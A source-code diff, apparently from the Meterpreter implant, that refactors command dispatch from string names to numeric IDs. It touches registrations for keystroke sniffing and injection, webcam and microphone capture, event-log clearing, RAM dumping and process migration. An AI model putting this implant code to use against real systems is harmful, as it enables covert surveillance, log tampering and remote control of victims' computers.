+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_KEYEVENT, request_ui_send_keyevent),
-	COMMAND_REQ("stdapi_ui_send_keyevent", request_ui_send_keyevent),
+	COMMAND_REQ(COMMAND_ID_STDAPI_UI_SEND_MOUSE, request_ui_send_mouse),
-	COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
 
 	// Event Log
-	COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN, request_sys_eventlog_open),
-	COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS, request_sys_eventlog_numrecords),
-	COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_READ, request_sys_eventlog_read),
-	COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST, request_sys_eventlog_oldest),
-	COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR, request_sys_eventlog_clear),
-	COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE, request_sys_eventlog_close),
 
 	// Power
-	COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS, request_sys_power_exitwindows),
 
 	// Webcam
-	COMMAND_REQ("webcam_list", request_webcam_list),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_LIST, request_webcam_list),
-	COMMAND_REQ("webcam_start", request_webcam_start),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_START, request_webcam_start),
-	COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_GET_FRAME, request_webcam_get_frame),
-	COMMAND_REQ("webcam_stop", request_webcam_stop),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_STOP, request_webcam_stop),
 
 	// Audio
-	COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
+	COMMAND_REQ(COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD, request_ui_record_mic),
 
 	COMMAND_TERMINATOR
 };

c/meterpreter/source/extensions/stdapi/server/sys/process/process.c

@@ -840,20 +840,22 @@ DWORD process_channel_read(Channel *channel, Packet *request,
  * Writes data from the remote half of the channel to the process's standard
  * input handle
  */
-DWORD process_channel_write( Channel *channel, Packet *request,
+DWORD process_channel_write(Channel* channel, Packet* request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten)
-		LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten )
 {
-	ProcessChannelContext *ctx = (ProcessChannelContext *)context;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)context;
 	DWORD result = ERROR_SUCCESS;
 
-	dprintf( "[PROCESS] process_channel_write. channel=0x%08X, ctx=0x%08X", channel, ctx );
+	dprintf("[PROCESS] process_channel_write. channel=0x%08X, ctx=0x%08X", channel, ctx);
 
 	if (ctx == NULL)
 	{
 		return result;
 	}
-	if ( !WriteFile( ctx->pStdin, buffer, bufferSize, bytesWritten, NULL ) )
+
+	if (!WriteFile(ctx->pStdin, buffer, bufferSize, bytesWritten, NULL))
+	{
 		result = GetLastError();
+	}
 
 	return result;
 }
@@ -918,25 +920,32 @@ DWORD process_channel_interact_destroy( HANDLE waitable, LPVOID entryContext, LP
  * Callback for when data is available on the standard output handle of
  * a process channel that is interactive mode
  */
-DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOID threadContext)
+DWORD process_channel_interact_notify(Remote* remote, LPVOID entryContext, LPVOID threadContext)
 {
-	Channel *channel = (Channel*)entryContext;
+	dprintf("[PROCESS] process_channel_interact_notify: START");
-	ProcessChannelContext *ctx = (ProcessChannelContext *)threadContext;
+	Channel* channel = (Channel*)entryContext;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)threadContext;
 	DWORD bytesRead, bytesAvail = 0;
 	CHAR buffer[16384];
 	DWORD result = ERROR_SUCCESS;
 
 	if (!met_api->channel.exists(channel) || ctx == NULL)
 	{
+		dprintf("[PROCESS] process_channel_interact_notify: channel not here, or context is NULL");
 		return result;
 	}
-	if( PeekNamedPipe( ctx->pStdout, NULL, 0, NULL, &bytesAvail, NULL ) )
+
+	dprintf("[PROCESS] process_channel_interact_notify: looking for stuff on the stdout pipe");
+	if (PeekNamedPipe(ctx->pStdout, NULL, 0, NULL, &bytesAvail, NULL))
 	{
-		if( bytesAvail )
+		dprintf("[PROCESS] process_channel_interact_notify: named pipe call returned, %u bytes", bytesAvail);
+		if (bytesAvail)
 		{
-			if( ReadFile( ctx->pStdout, buffer, sizeof(buffer) - 1, &bytesRead, NULL ) )
+			dprintf("[PROCESS] process_channel_interact_notify: attempting to read %u bytes", bytesAvail);
+			if (ReadFile(ctx->pStdout, buffer, sizeof(buffer) - 1, &bytesRead, NULL))
 			{
-				return met_api->channel.write( channel, remote, NULL, 0, buffer, bytesRead, NULL );
+				dprintf("[PROCESS] process_channel_interact_notify: read %u bytes, passing to channel write", bytesRead);
+				return met_api->channel.write(channel, remote, NULL, 0, buffer, bytesRead, NULL);
 			}
 			result = GetLastError();
 		}
@@ -944,7 +953,7 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 		{
 			// sf: if no data is available on the pipe we sleep to avoid running a tight loop
 			// in this thread, as anonymous pipes won't block for data to arrive.
-			Sleep( 100 );
+			Sleep(100);
 		}
 	}
 	else
@@ -952,42 +961,51 @@ DWORD process_channel_interact_notify(Remote *remote, LPVOID entryContext, LPVOI
 		result = GetLastError();
 	}
 
-	if( result != ERROR_SUCCESS )
+	if (result != ERROR_SUCCESS)
 	{
-		dprintf("Closing down socket: result: %d\n", result);
+		dprintf("Closing down channel: result: %d\n", result);
-		process_channel_close( channel, NULL, ctx );
+		process_channel_close(channel, NULL, ctx);
-		met_api->channel.close( channel, remote, NULL, 0, NULL );
+		met_api->channel.close(channel, remote, NULL, 0, NULL);
 	}
 
+	dprintf("[PROCESS] process_channel_interact_notify: END");
 	return result;
 }
 
 /*
  * Enables or disables interactivity with the standard output handle on the channel
  */
-DWORD process_channel_interact(Channel *channel, Packet *request, LPVOID context, BOOLEAN interact)
+DWORD process_channel_interact(Channel* channel, Packet* request, LPVOID context, BOOLEAN interact)
 {
-	ProcessChannelContext *ctx = (ProcessChannelContext *)context;
+	ProcessChannelContext* ctx = (ProcessChannelContext*)context;
 	DWORD result = ERROR_SUCCESS;
 
-	dprintf( "[PROCESS] process_channel_interact. channel=0x%08X, ctx=0x%08X, interact=%d", channel, ctx, interact );
+	dprintf("[PROCESS] process_channel_interact. channel=0x%08X, ctx=0x%08X, interact=%d", channel, ctx, interact);
 
 	if (!met_api->channel.exists(channel) || ctx == NULL)
 	{
+		dprintf("[PROCESS] process_channel_interact: Channel doesn't exist or context is NULL");
 		return result;
 	}
+
 	// If the remote side wants to interact with us, schedule the stdout handle
 	// as a waitable item
-	if (interact) {
+	if (interact)
+	{
 		// try to resume it first, if it's not there, we can create a new entry
-		if( (result = met_api->scheduler.signal_waitable( ctx->pStdout, SchedulerResume )) == ERROR_NOT_FOUND ) {
+		if ((result = met_api->scheduler.signal_waitable(ctx->pStdout, SchedulerResume)) == ERROR_NOT_FOUND)
-			result = met_api->scheduler.insert_waitable( ctx->pStdout, channel, context,
+		{
+			result = met_api->scheduler.insert_waitable(ctx->pStdout, channel, context,
 				(WaitableNotifyRoutine)process_channel_interact_notify,
-				(WaitableDestroyRoutine)process_channel_interact_destroy );
+				(WaitableDestroyRoutine)process_channel_interact_destroy);
 		}
-	} else { // Otherwise, pause it
-		result = met_api->scheduler.signal_waitable( ctx->pStdout, SchedulerPause );
 	}
+	else
+	{
+		// Otherwise, pause it
+		result = met_api->scheduler.signal_waitable(ctx->pStdout, SchedulerPause);
+	}
+	dprintf("[PROCESS] process_channel_interact: done");
 	return result;
 }
 

c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c

@@ -296,30 +296,6 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request)
 	return ERROR_SUCCESS;
 }
 
-/*
- * Returns the sniffed keystrokes
- */
-
-DWORD request_ui_get_keys(Remote *remote, Packet *request)
-{
-	Packet *response = met_api->packet.create_response(request);
-	DWORD result = ERROR_SUCCESS;
-
-  if (tKeyScan) {
-		// This works because NULL defines the end of data (or if its wrapped, the whole buffer)
-		met_api->packet.add_tlv_string(response, TLV_TYPE_KEYS_DUMP, (LPCSTR)g_keyscan_buf);
-		memset(g_keyscan_buf, 0, KEYBUFSIZE);
-		g_idx = 0;
-	}
-	else {
-		result = 1;
-	}
-
-	// Transmit the response
-	met_api->packet.transmit_response(result, remote, response);
-	return ERROR_SUCCESS;
-}
-
 /*
  * Returns the sniffed keystrokes (UTF-8)
  */

c/meterpreter/source/extensions/stdapi/server/ui/ui.h

@@ -9,7 +9,6 @@ DWORD request_ui_get_idle_time(Remote *remote, Packet *request);
 
 DWORD request_ui_start_keyscan(Remote *remote, Packet *request);
 DWORD request_ui_stop_keyscan(Remote *remote, Packet *request);
-DWORD request_ui_get_keys(Remote *remote, Packet *request);
 DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request);
 
 DWORD request_ui_send_keys(Remote *remote, Packet *request);

c/meterpreter/source/extensions/unhook/unhook.c

@@ -19,7 +19,7 @@ DWORD unhook_pe(Remote *remote, Packet *packet);
 Command customCommands[] =
 {
 	// custom commands go here
-	COMMAND_REQ("unhook_pe", unhook_pe),
+	COMMAND_REQ(COMMAND_ID_UNHOOK_PE, unhook_pe),
 
 	COMMAND_TERMINATOR
 };
@@ -30,13 +30,13 @@ Command customCommands[] =
  * @param remote Pointer to the remote instance.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
+DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote* remote)
 {
     met_api = api;
 
-	met_api->command.register_all( customCommands );
+    met_api->command.register_all(customCommands);
 
-	return ERROR_SUCCESS;
+    return ERROR_SUCCESS;
 }
 
 /*!
@@ -44,11 +44,11 @@ DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
  * @param remote Pointer to the remote instance.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+DWORD __declspec(dllexport) DeinitServerExtension(Remote* remote)
 {
-	met_api->command.deregister_all( customCommands );
+    met_api->command.deregister_all(customCommands);
 
-	return ERROR_SUCCESS;
+    return ERROR_SUCCESS;
 }
 
 

c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp

@@ -14,7 +14,7 @@ extern "C" {
 
 	Command customCommands[] =
 	{
-		COMMAND_REQ("dump_ram", dump_ram),
+		COMMAND_REQ(COMMAND_ID_WINPMEM_DUMP_RAM, dump_ram),
 		COMMAND_TERMINATOR
 	};
 

c/meterpreter/source/metsrv/base.c

@@ -56,44 +56,44 @@ DWORD THREADCALL command_process_thread(THREAD * thread);
 Command baseCommands[] =
 {
 	// Console commands
-	{ "core_console_write",
+	{ COMMAND_ID_CORE_CONSOLE_WRITE,
 		{ remote_request_core_console_write, NULL, { TLV_META_TYPE_STRING }, 1 | ARGUMENT_FLAG_REPEAT },
 		{ remote_response_core_console_write, NULL, EMPTY_TLV },
 	},
 
 	// Native Channel commands
-	// this overloads the "core_channel_open" in the base command list
+	// this overloads the COMMAND_ID_CORE_CHANNEL_OPEN in the base command list
-	COMMAND_REQ_REP("core_channel_open", remote_request_core_channel_open, remote_response_core_channel_open),
+	COMMAND_REQ_REP(COMMAND_ID_CORE_CHANNEL_OPEN, remote_request_core_channel_open, remote_response_core_channel_open),
-	COMMAND_REQ("core_channel_write", remote_request_core_channel_write),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_WRITE, remote_request_core_channel_write),
-	COMMAND_REQ_REP("core_channel_close", remote_request_core_channel_close, remote_response_core_channel_close),
+	COMMAND_REQ_REP(COMMAND_ID_CORE_CHANNEL_CLOSE, remote_request_core_channel_close, remote_response_core_channel_close),
 
 	// Buffered/Pool channel commands
-	COMMAND_REQ("core_channel_read", remote_request_core_channel_read),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_READ, remote_request_core_channel_read),
 	// Pool channel commands
-	COMMAND_REQ("core_channel_seek", remote_request_core_channel_seek),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_SEEK, remote_request_core_channel_seek),
-	COMMAND_REQ("core_channel_eof", remote_request_core_channel_eof),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_EOF, remote_request_core_channel_eof),
-	COMMAND_REQ("core_channel_tell", remote_request_core_channel_tell),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_TELL, remote_request_core_channel_tell),
 	// Soon to be deprecated
-	COMMAND_REQ("core_channel_interact", remote_request_core_channel_interact),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_INTERACT, remote_request_core_channel_interact),
 	// Packet Encryption
-	COMMAND_REQ("core_negotiate_tlv_encryption", request_negotiate_aes_key),
+	COMMAND_REQ(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION, request_negotiate_aes_key),
 	// timeouts
-	COMMAND_REQ("core_transport_set_timeouts", remote_request_core_transport_set_timeouts),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS, remote_request_core_transport_set_timeouts),
 
-	COMMAND_REQ("core_transport_getcerthash", remote_request_core_transport_getcerthash),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH, remote_request_core_transport_getcerthash),
-	COMMAND_REQ("core_transport_setcerthash", remote_request_core_transport_setcerthash),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH, remote_request_core_transport_setcerthash),
 
-	COMMAND_REQ("core_transport_list", remote_request_core_transport_list),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_LIST, remote_request_core_transport_list),
-	COMMAND_INLINE_REQ("core_transport_sleep", remote_request_core_transport_sleep),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_SLEEP, remote_request_core_transport_sleep),
-	COMMAND_INLINE_REQ("core_transport_change", remote_request_core_transport_change),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_CHANGE, remote_request_core_transport_change),
-	COMMAND_INLINE_REQ("core_transport_next", remote_request_core_transport_next),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_NEXT, remote_request_core_transport_next),
-	COMMAND_INLINE_REQ("core_transport_prev", remote_request_core_transport_prev),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_TRANSPORT_PREV, remote_request_core_transport_prev),
-	COMMAND_REQ("core_transport_add", remote_request_core_transport_add),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_ADD, remote_request_core_transport_add),
-	COMMAND_REQ("core_transport_remove", remote_request_core_transport_remove),
+	COMMAND_REQ(COMMAND_ID_CORE_TRANSPORT_REMOVE, remote_request_core_transport_remove),
 	// Migration
-	COMMAND_INLINE_REQ("core_migrate", remote_request_core_migrate),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_MIGRATE, remote_request_core_migrate),
 	// Shutdown
-	COMMAND_INLINE_REQ("core_shutdown", remote_request_core_shutdown),
+	COMMAND_INLINE_REQ(COMMAND_ID_CORE_SHUTDOWN, remote_request_core_shutdown),
 	// Terminator
 	COMMAND_TERMINATOR
 };
@@ -112,7 +112,8 @@ void command_register_all(Command commands[])
 {
 	DWORD index;
 
-	for (index = 0; commands[index].method; index++)
+	// Zero indicates the end of the command list
+	for (index = 0; commands[index].command_id > 0; index++)
 	{
 		command_register(&commands[index]);
 	}
@@ -123,7 +124,7 @@ void command_register_all(Command commands[])
 	dprintf("[COMMAND LIST] Listing current extension commands");
 	for (command = extensionCommands; command; command = command->next)
 	{
-		dprintf("[COMMAND LIST] Found: %s", command->method);
+		dprintf("[COMMAND LIST] Found: %u", command->command_id);
 	}
 #endif
 }
@@ -137,7 +138,7 @@ DWORD command_register(Command *command)
 {
 	Command *newCommand;
 
-	dprintf("Registering a new command (%s)...", command->method);
+	dprintf("Registering a new command (%u)...", command->command_id);
 	if (!(newCommand = (Command *)malloc(sizeof(Command))))
 	{
 		return ERROR_NOT_ENOUGH_MEMORY;
@@ -169,7 +170,7 @@ void command_deregister_all(Command commands[])
 {
 	DWORD index;
 
-	for (index = 0; commands[index].method; index++)
+	for (index = 0; commands[index].command_id > 0; index++)
 	{
 		command_deregister(&commands[index]);
 	}
@@ -190,8 +191,10 @@ DWORD command_deregister(Command *command)
 		current;
 		prev = current, current = current->next)
 	{
-		if (strcmp(command->method, current->method))
+		if (command->command_id == current->command_id)
+		{
 			continue;
+		}
 
 		if (prev)
 		{
@@ -261,7 +264,7 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 	Command *commands[2] = { baseCommand, extensionCommand };
 	Command *command = NULL;
 	DWORD dwIndex;
-	LPCSTR lpMethod = NULL;
+	UINT commandId = 0;
 
 	__try
 	{
@@ -276,15 +279,15 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 					continue;
 				}
 
-				lpMethod = command->method;
+				commandId = command->command_id;
-				dprintf("[COMMAND] Executing command %s", lpMethod);
+				dprintf("[COMMAND] Executing command %u", commandId);
 
 				// Impersonate the thread token if needed (only on Windows)
 				if (remote->server_token != remote->thread_token)
 				{
 					if (!ImpersonateLoggedOnUser(remote->thread_token))
 					{
-						dprintf("[COMMAND] Failed to impersonate thread token (%s) (%u)", lpMethod, GetLastError());
+						dprintf("[COMMAND] Failed to impersonate thread token (%u) (%u)", commandId, GetLastError());
 					}
 				}
 
@@ -297,19 +300,19 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				}
 
 				packetTlvType = packet_get_type(packet);
-				dprintf("[DISPATCH] Packet type for %s is %u", lpMethod, packetTlvType);
+				dprintf("[DISPATCH] Packet type for %u is %u", commandId, packetTlvType);
 				switch (packetTlvType)
 				{
 				case PACKET_TLV_TYPE_REQUEST:
 				case PACKET_TLV_TYPE_PLAIN_REQUEST:
 					if (command->request.inline_handler) {
-						dprintf("[DISPATCH] executing inline request handler %s", lpMethod);
+						dprintf("[DISPATCH] executing inline request handler %u", commandId);
 						serverContinue = command->request.inline_handler(remote, packet, &result) && serverContinue;
-						dprintf("[DISPATCH] executed %s, continue %s", lpMethod, serverContinue ? "yes" : "no");
+						dprintf("[DISPATCH] executed %u, continue %s", commandId, serverContinue ? "yes" : "no");
 					}
 					else
 					{
-						dprintf("[DISPATCH] executing request handler %s", lpMethod);
+						dprintf("[DISPATCH] executing request handler %u", commandId);
 						result = command->request.handler(remote, packet);
 					}
 					break;
@@ -317,12 +320,12 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				case PACKET_TLV_TYPE_PLAIN_RESPONSE:
 					if (command->response.inline_handler)
 					{
-						dprintf("[DISPATCH] executing inline response handler %s", lpMethod);
+						dprintf("[DISPATCH] executing inline response handler %u", commandId);
 						serverContinue = command->response.inline_handler(remote, packet, &result) && serverContinue;
 					}
 					else
 					{
-						dprintf("[DISPATCH] executing response handler %s", lpMethod);
+						dprintf("[DISPATCH] executing response handler %u", commandId);
 						result = command->response.handler(remote, packet);
 					}
 					break;
@@ -343,12 +346,12 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 				packet_call_completion_handlers(remote, packet, requestId);
 			}
 
-			dprintf("[COMMAND] Completion handlers finished for %s.", lpMethod);
+			dprintf("[COMMAND] Completion handlers finished for %u.", commandId);
 		} while (0);
 	}
 	__except (EXCEPTION_EXECUTE_HANDLER)
 	{
-		dprintf("[COMMAND] Exception hit in command %s", lpMethod);
+		dprintf("[COMMAND] Exception hit in command %u", commandId);
 	}
 
 	if (!packet->local)
@@ -364,49 +367,49 @@ BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Rem
 
 /*!
  * @brief Attempt to locate a command in the base command list.
- * @param method String that identifies the command.
+ * @param commandId String that identifies the command.
  * @returns Pointer to the command entry in the base command list.
- * @retval NULL Indicates that no command was found for the given method.
+ * @retval NULL Indicates that no command was found for the given commandId.
  * @retval NON-NULL Pointer to the command that can be executed.
  */
-Command* command_locate_base(const char* method)
+Command* command_locate_base(UINT commandId)
 {
 	DWORD index;
 
-	dprintf("[COMMAND EXEC] Attempting to locate base command %s", method);
+	dprintf("[COMMAND EXEC] Attempting to locate base command %u", commandId);
-	for (index = 0; baseCommands[index].method; ++index)
+	for (index = 0; baseCommands[index].command_id; ++index)
 	{
-		if (strcmp(baseCommands[index].method, method) == 0)
+		if (baseCommands[index].command_id == commandId)
 		{
 			return &baseCommands[index];
 		}
 	}
 
-	dprintf("[COMMAND EXEC] Couldn't find base command %s", method);
+	dprintf("[COMMAND EXEC] Couldn't find base command %u", commandId);
 	return NULL;
 }
 
 /*!
  * @brief Attempt to locate a command in the extensions command list.
- * @param method String that identifies the command.
+ * @param commandId ID of the command to locate the associatd extension for.
  * @returns Pointer to the command entry in the extensions command list.
- * @retval NULL Indicates that no command was found for the given method.
+ * @retval NULL Indicates that no command was found for the given commandId.
  * @retval NON-NULL Pointer to the command that can be executed.
  */
-Command* command_locate_extension(const char* method)
+Command* command_locate_extension(UINT commandId)
 {
 	Command* command;
 
-	dprintf("[COMMAND EXEC] Attempting to locate extension command %s (%p)", method, extensionCommands);
+	dprintf("[COMMAND EXEC] Attempting to locate extension command %u (%p)", commandId, extensionCommands);
 	for (command = extensionCommands; command; command = command->next)
 	{
-		if (strcmp(command->method, method) == 0)
+		if (command->command_id == commandId)
 		{
 			return command;
 		}
 	}
 
-	dprintf("[COMMAND EXEC] Couldn't find extension command %s", method);
+	dprintf("[COMMAND EXEC] Couldn't find extension command %u", commandId);
 	return NULL;
 }
 
@@ -435,25 +438,24 @@ BOOL command_handle(Remote *remote, Packet *packet)
 	Command* extensionCommand = NULL;
 	Command** commands = NULL;
 	Packet* response = NULL;
-	PCHAR lpMethod = NULL;
+
-	Tlv methodTlv;
+	UINT commandId = packet_get_tlv_value_uint(packet, TLV_TYPE_COMMAND_ID);
 
 	do
 	{
-		if (packet_get_tlv_string(packet, TLV_TYPE_METHOD, &methodTlv) != ERROR_SUCCESS)
+
+		if (commandId == 0)
 		{
-			dprintf("[COMMAND] Unable to extract method from packet.");
+			dprintf("[COMMAND] Unable to extract commandId from packet.");
 			break;
 		}
 
-		lpMethod = (PCHAR)methodTlv.buffer;
+		baseCommand = command_locate_base(commandId);
-
+		extensionCommand = command_locate_extension(commandId);
-		baseCommand = command_locate_base(lpMethod);
-		extensionCommand = command_locate_extension(lpMethod);
 
 		if (baseCommand == NULL && extensionCommand == NULL)
 		{
-			dprintf("[DISPATCH] Command not found: %s", lpMethod);
+			dprintf("[DISPATCH] Command not found: %u", commandId);
 			// We have no matching command for this packet, so it won't get handled. We
 			// need to send an empty response and clean up here before exiting out.
 			response = packet_create_response(packet);
@@ -474,13 +476,13 @@ BOOL command_handle(Remote *remote, Packet *packet)
 			|| (extensionCommand && command_is_inline(extensionCommand, packet))
 			|| packet->local)
 		{
-			dprintf("[DISPATCH] Executing inline: %s", lpMethod);
+			dprintf("[DISPATCH] Executing inline: %u", commandId);
 			result = command_process_inline(baseCommand, extensionCommand, remote, packet);
 			dprintf("[DISPATCH] Executed inline: result %u (%x)", result, result);
 		}
 		else
 		{
-			dprintf("[DISPATCH] Executing in thread: %s", lpMethod);
+			dprintf("[DISPATCH] Executing in thread: %u", commandId);
 
 			commands = (Command**)malloc(sizeof(Command*) * 2);
 			*commands = baseCommand;

c/meterpreter/source/metsrv/base_dispatch.c

@@ -788,17 +788,17 @@ DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packe
  *      The channel type to allocate.  If set, the function returns, allowing
  *      a further up extension handler to allocate the channel.
  */
-DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
+DWORD remote_request_core_channel_open(Remote* remote, Packet* packet)
 {
-	Packet *response;
+	Packet* response;
 	DWORD res = ERROR_SUCCESS;
-	Channel *newChannel;
+	Channel* newChannel;
 	PCHAR channelType;
 	DWORD flags = 0;
 
 	do
 	{
-		dprintf( "[CHANNEL] Opening new channel for packet %p", packet );
+		dprintf("[CHANNEL] Opening new channel for packet %p", packet);
 
 		// If the channel open request had a specific channel type
 		if ((channelType = packet_get_tlv_value_string(packet, TLV_TYPE_CHANNEL_TYPE)))
@@ -810,11 +810,11 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
 		// Get any flags that were supplied
 		flags = packet_get_tlv_value_uint(packet, TLV_TYPE_FLAGS);
 
-		dprintf( "[CHANNEL] Opening %s %u", channelType, flags );
+		dprintf("[CHANNEL] Opening %s %u", channelType, flags);
 
 		// Allocate a response
 		response = packet_create_response(packet);
-		
+
 		// Did the response allocation fail?
 		if ((!response) || (!(newChannel = channel_create(0, flags))))
 		{
@@ -822,23 +822,24 @@ DWORD remote_request_core_channel_open(Remote *remote, Packet *packet)
 			break;
 		}
 
-		dprintf( "[CHANNEL] Opened %s %u", channelType, flags );
+		dprintf("[CHANNEL] Opened %s %u", channelType, flags);
 
 		// Get the channel class and set it
 		newChannel->cls = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_CLASS);
 
-		dprintf( "[CHANNEL] Channel class for %s: %u", channelType, newChannel->cls );
+		dprintf("[CHANNEL] Channel class for %s: %u", channelType, newChannel->cls);
 
 		// Add the new channel identifier to the response
-		if ((res = packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID,
+		if ((res = packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(newChannel))) != ERROR_SUCCESS)
-				channel_get_id(newChannel))) != ERROR_SUCCESS)
+		{
 			break;
+		}
 
 		// Transmit the response
-		dprintf( "[CHANNEL] Sending response for %s", channelType  );
+		dprintf("[CHANNEL] Sending response for %s", channelType);
 		res = packet_transmit(remote, response, NULL);
 
-		dprintf( "[CHANNEL] Done" );
+		dprintf("[CHANNEL] Done");
 
 	} while (0);
 
@@ -1317,32 +1318,32 @@ DWORD remote_request_core_channel_tell(Remote *remote, Packet *packet)
  * req: TLV_TYPE_CHANNEL_ID -- The channel identifier to interact with
  * req: TLV_TYPE_BOOL       -- True if interactive, false if not.
  */
-DWORD remote_request_core_channel_interact(Remote *remote, Packet *packet)
+DWORD remote_request_core_channel_interact(Remote* remote, Packet* packet)
 {
-	Packet *response = packet_create_response(packet);
+	Packet* response = packet_create_response(packet);
-	Channel *channel = NULL;
+	Channel* channel = NULL;
 	DWORD channelId;
 	DWORD result = ERROR_SUCCESS;
 	BOOLEAN interact;
 
 	// Get the channel identifier
 	channelId = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_ID);
-	interact  = packet_get_tlv_value_bool(packet, TLV_TYPE_BOOL);
+	interact = packet_get_tlv_value_bool(packet, TLV_TYPE_BOOL);
 
 	// If the channel is found, set the interactive flag accordingly
 	if ((channel = channel_find_by_id(channelId)))
 	{
-		lock_acquire( channel->lock );
+		lock_acquire(channel->lock);
 
 		// If the response packet is valid
-		if ((response) &&
+		if ((response) && (channel_get_class(channel) != CHANNEL_CLASS_BUFFERED))
-		    (channel_get_class(channel) != CHANNEL_CLASS_BUFFERED))
 		{
-			NativeChannelOps *native = (NativeChannelOps *)&channel->ops;
+			NativeChannelOps* native = (NativeChannelOps*)&channel->ops;
 
 			// Check to see if this channel has a registered interact handler
-			dprintf( "[DISPATCH] attempting to set interactive: %d context 0x%p", interact, native->context );
+			dprintf("[DISPATCH] attempting to set interactive: %d context 0x%p", interact, native->context);
-			if (native->interact) {
+			if (native->interact)
+			{
 				result = native->interact(channel, packet, native->context, interact);
 			}
 		}
@@ -1350,7 +1351,7 @@ DWORD remote_request_core_channel_interact(Remote *remote, Packet *packet)
 		// Set the channel's interactive state
 		channel_set_interactive(channel, interact);
 
-		lock_release( channel->lock );
+		lock_release(channel->lock);
 	}
 
 	// Send the response to the requestor so that the interaction can be 

c/meterpreter/source/metsrv/channel.c

@@ -260,8 +260,7 @@ PVOID channel_get_buffered_io_context(Channel *channel)
 DWORD channel_write_to_remote(Remote *remote, Channel *channel, PUCHAR chunk, 
 		ULONG chunkLength, PULONG bytesWritten)
 {
-	Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, 
+	Packet *request = packet_create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_CORE_CHANNEL_WRITE);
-			"core_channel_write");
 	DWORD res = ERROR_SUCCESS;
 	Tlv entries[2];
 	DWORD idNbo;
@@ -386,7 +385,7 @@ ChannelCompletionRoutine *channel_duplicate_completion_routine(
  * Channel completion routine dispatcher
  */
 DWORD _channel_packet_completion_routine(Remote *remote, Packet *packet, 
-		LPVOID context, LPCSTR method, DWORD result)
+		LPVOID context, UINT commandId, DWORD result)
 {
 	ChannelCompletionRoutine *comp = (ChannelCompletionRoutine *)context;
 	DWORD channelId = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_ID);
